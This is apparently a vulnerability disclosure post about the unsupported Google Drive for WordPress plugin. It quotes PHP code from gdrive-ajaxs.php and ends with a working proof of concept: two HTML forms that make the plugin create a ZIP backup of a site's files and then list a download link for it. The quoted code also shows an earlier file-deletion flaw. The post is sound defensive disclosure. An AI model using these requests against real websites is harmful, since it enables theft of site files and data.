Yesterday we had a request on this website for a file that would be at /wp-content/plugins/wp-google-drive/gdrive-ajaxs.php, which is a file from the plugin Google Drive for WordPress (wp-google-drive). Just about a month ago we had provided more details on an arbitrary file deletion vulnerability in that plugin, which had been incorrectly labeled by the discoverer, Lenon Leite, as being a remote execution (RCE) vulnerability. When exploiting that vulnerability you would send a request to that particular file, but that type of vulnerability is not one that based on past experience, hackers would likely be interested in exploiting. While hackers’ level of interest in that type of vulnerability could have changed, what seems more likely that is someone was either thinking it was a RCE vulnerability, since those have been likely to be exploited in the past, or there was something else that a hacker realized was exploitable in that plugin that would be of more interest.
In looking at what else was accessible through that file we didn’t see anything that looks like it would be likely to be exploited, but we did notice another vulnerability.
In that file different code will be run depending on the value of the POST input “ajaxstype”:
Through that code can be run that will perform a backup:
12 13 14 15
case 'ontimebackup': $bkp = new gd_take_backup('ontime_backup'); $backup = $bkp->schedule_time_backup(); break;
The function schedule_time_backup(), which is located in the file /class/backup-class.php, will by default create a ZIP file backup of the website’s files in the directory /wp-content/backup/ with the filename based on the current time of the server using the function time(). While it would be easy enough to iterate through possible values for the name of the file and download the generated file, it turns out it is even easier than that to download the backup file, as the code utilized in the previously disclosed arbitrary file deletion vulnerability ends with a call to a function that lists the files in the directory and even provides a download link:
17 18 19 20 21 22 23
case 'del_fl_bkp': gd_delete_listById($_POST['id']); $dir = GBACKUP_PLUGIN_BACKUPFOLDER_PATH."/".$_POST['file_name']; @unlink( $dir ); $dbkp = new settings_option; $dbkp->file_manage_list(); break;
The plugin doesn’t appear to have been supported for years, so we haven’t attempted to notify the developer of this vulnerability.
Proof of Concept
The following proof of concept will provide a link to a ZIP file containing the website’s files.
Make sure to replace “[path to WordPress]” with the location of WordPress.
This request will generate the backup (make sure to replace “[path to WordPress]” with the location of WordPress):
<html> <body> <form action="http://localhost/wp-content/plugins/wp-google-drive/gdrive-ajaxs.php" method="POST"> <input type="hidden" name="ajaxstype" value="ontimebackup" /> <input type="submit" value="Submit" /> </form> </body>
This request provides a link to download the backup:
<html> <body> <form action="http://[path to WordPress]/wp-content/plugins/wp-google-drive/gdrive-ajaxs.php" method="POST"> <input type="hidden" name="ajaxstype" value="del_fl_bkp" /> <input type="submit" value="Submit" /> </form> </body>